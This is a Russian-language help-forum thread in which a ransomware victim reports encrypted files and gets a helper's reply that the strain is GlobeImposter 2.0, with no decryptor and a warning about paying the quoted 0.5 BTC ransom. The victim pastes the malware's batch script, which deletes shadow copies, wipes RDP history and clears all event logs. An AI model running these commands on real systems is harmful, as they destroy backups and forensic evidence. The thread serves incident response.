Шифровальшик {travolta_john@aol.com}

[Artem Parfenenko]

Здравствуйте

 

Зашифровали все рабочие данные.
с добавлением к имени "{travolta_john@aol.com}"
Во всех папках прилагался файл:

how_to_back_files.html

 

проверили с помошью

• Kaspersky Virus Removal Tool 2015;
• Dr.Web CureIt!.

Выявлены следующие результаты:
https://ibb.co/gkS4L0

https://ibb.co/dEmBYL

bat файл содержил следующую информацию:

 

@echo off

vssadmin.exe Delete Shadows /All /Quiet

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

cd %userprofile%\documents\

attrib Default.rdp -s -h

del Default.rdp 

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

 

Логи в файле:
CollectionLog-2018.10.31-12.07.zip

 

Спасибо, очень ждем Вашей помощи.

 

 

how_to_back_files.html

CollectionLog-2018.10.31-12.07.zip

[Sandor]

Здравствуйте!

 

Автологер разве не предупредил вас, что запущен из терминальной сессии, а надо из консоли?

По возможности, переделайте.

 

+ пару зашифрованных документов в архиве прикрепите к следующему сообщению.

[Artem Parfenenko]

К сожалению проделать выгрузку логов не из терминала, нет возможности.
Файлы для примера в Архиве "Примеры.rar".

 

Примеры.rar

[Sandor]

К сожалению, это GlobeImposter 2.0 и расшифровки нет.

[Artem Parfenenko]

Переписка с злоумышленником:

1 ID = 0.5 BTC 
For decrypt need pay 0.5 BTC 
You can send me one file for test. 
File only picture or text. No database, no backup. 
Only we can decrypt your data.

 

 

[Sandor]

На ваш страх и риск. Известны случаи, когда после получения оплаты злодеи исчезали и ничего не высылали.